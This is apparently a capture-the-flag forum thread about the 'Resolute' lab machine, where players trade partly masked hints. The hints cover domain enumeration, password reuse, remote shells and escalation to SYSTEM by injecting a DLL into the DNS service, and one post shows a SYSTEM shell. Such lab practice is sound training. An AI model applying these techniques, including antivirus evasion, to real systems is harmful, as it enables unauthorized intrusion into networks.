Resolute

wrote in wrong place sorry

Rooted! It was a bit frustrating at times, but I learned a lot from this one thanks @egre55. If you’re stuck PM me what you have tried and I will do my best to help.

rooted!

user1: A little bit of time to understand what to see, just open your eyes while enum. With enum4****x it’s more simple to see

user2: some admins make mistakes with password, some users change it and some others not. When you reach second user read carefully what you can see, and search something you cannot see without an eed dry l*t command

root: user dnmd+imt-sms***r+mv***m, the last for dll… spent too much time to remember that I have few time to operate before all turn again back

very beautiful machine, very very good work, realistic is the right word

some hint for d** restart ?

I’m spinning my wheels here. I have r***. I’m not exactly what M*******t module that could be used with the creds as mentioned in this thread. I guess I’m missing what’s right in front of my face. I feel like I’m missing crucial info in regards to enumeration. Could someone pm me with a nudge? First windows box. Thank you all.

Type your comment> @jgfreeski said:

I’m looking to get in to User right now, and I’m stuck trying to find a way in with pass and user credentials. I’m using e***-w**** and i keep getting authorization errors. any nudge in the right direction would be great!

maybe try a different user…

Type your comment> @qwas2zx9 said:

i have already made a d** injection using the user2 and i am trouble on restarting the d*s server. Can you give me a nudge?

net start and friends didn’t work for me, but sc.exe did. It’s also important to use sc.exe to disambiguate if you an a powershell environment (sc is an alias for Set-Content).

Finally rooted !!! Thanks @kkaz for the help.

Type your comment> @ctlfish said:

Type your comment> @qwas2zx9 said:

i have already made a d** injection using the user2 and i am trouble on restarting the d*s server. Can you give me a nudge?

net start and friends didn’t work for me, but sc.exe did. It’s also important to use sc.exe to disambiguate if you an a powershell environment (sc is an alias for Set-Content).

I rooted it using a different approach but I want to take the hard path which is injecting dll and restarting the service. I am struggling on using the hard method.

Spoiler Removed

Spoiler Removed

Spoiler Removed

Well this machine was a b**** due to my severe lack of Windows knowledge. I learned some valuable lessons though. If I could give some hints:

For user 1: Basic enumeration, go through all output! Afterwards you simply have to know how to use, some ports are more than what they seem.

For user 2: Dig through the root with /h.

For root: Compile your file for the right architecture. You don’t have to evade anti-virus if you compile your own file, you can simply download it on the target. Of course you can alternatively generate it with mm and use It sm*****r to evade AV. Also, check the registry key to make sure your file has been set correctly. There are some excellent articles written on this method, be sure to read them thoroughly once you have the right exploit.

I loved this box! It’s really realistic and takes a bit of time to look through to gather the required parts needed to own.

User 1:

Finding the first user requires a bit of enumeration in order to find more information about the LP setup, including users. There is a tool you can use to help with this. e4***x is helpful and so is search tool (think what kind of box this is) that has been shown by ippsec. I personally used the latter to find my information, but both tools will work.

Maybe you found a note left by a lazy sysadmin, is it good? Maybe it’s for another user? Take the information you know from either of the above tools to find users that you can check to see if the note works on them too. There is a tool, again recently shown by ippsec, that makes this super easy.

Then you have to be evil and use what you now know to exploit a service running on the box to get a shell.

User 2:

This was a bit of a problem for me and it shouldn’t have. Being a Linux guy myself, I always use the -a flag when doing a directory listing. Maybe something like this will help in the root directory? If you find something that looks interesting, keep looking and you will find a file that will contain some magic information.

Again, be evil and use what you know to get a shell.

Root

I spent too much time on this when I had it all along. I knew from my nmap scan a service on a low port running, but couldn’t find information on the box. I was trying to see who I was, but I wasn’t seeing all of that information. Due to this, I wasn’t seeing everything I needed to. Once I did that, I saw I was privileged to manage a service on the box.

Sharped your Google Fu and look around for a known way to use this privilege to get SYSTEM. It’s actually pretty easy. Host a certain file, manage the service in your shell, listen and you might get what you’re looking for.

C:\Users\Administrator\Desktop>whoami && hostname && ipconfig
whoami && hostname && ipconfig
nt authority\system
Resolute

Need hint for the dll, been in x64 but in DnsPluginInitialize no shell spawn

Hi guys, I am having trouble connecting with the i******-s****r. Similar problem with others, server is running, being connected but not asked for file. Anyone can DM me for this?

Ohh I found a lot of Users… btw first windows box… I hope Resolute would guide me …

Can someone tell me why it says that r*** is not a dn**n when I execute "net user /domain r" in the “local group memberships”? It seems to be giving the same kind of information in the RP* daemon as well. I have tried switching VPN files but it shows still the same thing… This is really frustrating because I have been on this machine for weeks.

Type your comment> @OddRabbit said:

Can someone tell me why it says that r*** is not a dn**n when I execute "net user /domain r" in the “local group memberships”? It seems to be giving the same kind of information in the RP* daemon as well. I have tried switching VPN files but it shows still the same thing… This is really frustrating because I have been on this machine for weeks.

Are you looking at all of the privs for r***? Try another command that will tell you who you are, but with an extra argument.

Type your comment> @mav3n said:

Type your comment> @OddRabbit said:

Can someone tell me why it says that r*** is not a dn**n when I execute "net user /domain r" in the “local group memberships”? It seems to be giving the same kind of information in the RP* daemon as well. I have tried switching VPN files but it shows still the same thing… This is really frustrating because I have been on this machine for weeks.

Are you looking at all of the privs for r***? Try another command that will tell you who you are, but with an extra argument.

Thank you so much!!!